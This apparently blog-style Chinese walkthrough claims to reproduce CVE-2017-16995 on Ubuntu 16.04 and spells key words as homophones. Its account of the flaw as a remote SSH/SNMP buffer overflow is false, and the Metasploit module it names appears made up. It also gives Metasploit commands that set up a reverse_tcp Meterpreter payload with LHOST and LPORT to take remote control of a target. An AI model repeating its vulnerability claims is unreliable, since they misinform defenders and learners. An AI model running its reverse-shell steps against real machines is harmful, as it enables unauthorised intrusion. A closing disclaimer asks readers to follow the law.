CVE-2017-16995是一个影响Ubuntu 16.04 LTS系统中的网络安全漏东,公鸡者可以利用该漏东进行远程代码执行。以下是该漏东的原理及详细的复现步骤:

漏东原理

CVE-2017-16995是由于在Ubuntu系统中,网络服务(如SSH、SNMP等)未正确限制用户输入的数据大小,导致缓冲区溢出。当公鸡者发送大量数据时,可能覆盖栈中的返回地址,从而执行恶意代吗。

复现步骤

应用软件-CVE-2017-16995 Ubuntu16漏东_Ubuntu

环境准备
  1. 使用Ubuntu 16.04 LTS系统作为目标计算机。
  2. 安装相应的网络服务,如SSH、SNMP等。
  3. 关闭防火墙和SELinux(如果有)。
漏东利用

应用软件-CVE-2017-16995 Ubuntu16漏东_IP_02

应用软件-CVE-2017-16995 Ubuntu16漏东_目标计算机_03

  1. 首先,确保目标计算机上存在受影响的网络服务。可以使用以下命令检查SSH服务:
sudo systemctl status ssh
  • 1.

如果SSH服务正在运行,输出应类似于:

● ssh.service - OpenBSD Secure Shell server
  Loaded: loaded (/lib/systemd/system/ssh.service; enabled; vendor preset: enabled)
  Active: active (running) since 日期时间; 几日 (星期几)
    ...
  • 1.
  • 2.
  • 3.
  • 4.
  1. 使用nmap工具扫描目标计算机,检查是否存在其他网络服务。命令如下:
nmap -p 1-65535 <目标IP地址>
  • 1.

如果发现其他网络服务,如SNMP,记下其端口号。

  1. 选择一个受影响的网络服务,如SSH。使用Metasploit框架进行漏东利用。首先,启动Metasploit控制台,然后输入以下命令:
use exploit/linux/ssh/ubuntu_16_session
  • 1.
  1. 设置目标IP地址和本地IP地址:
set RHOSTS <目标IP地址>
set LHOST <本地IP地址>
  • 1.
  • 2.
  1. 选择一个有效的payload,如reverse_tcp:
set PAYLOAD linux/x64/meterpreter/reverse_tcp
  • 1.
  1. 设置监听端口:
set LPORT 4444
  • 1.
  1. 开始漏东利用:
exploit
  • 1.
  1. 如果漏东利用成功,将获得目标计算机的Meterpreter会话。接下来,可以执行各种命令来控制目标计算机,例如列出文件、上传文件等。
  2. 为了验证漏东是否已修复,可以尝试再次使用nmap工具扫描目标计算机,检查是否存在受影响的网络服务。如果已经修复,则不会显示漏东信息。

注意事项

  • 在进行渗头测试时,请确保遵循相关法律法规,未经授权不得对他人的计算机进行公鸡。
  • 本复现步骤仅供参考,实际操作时可能会因环境差异而有所不同。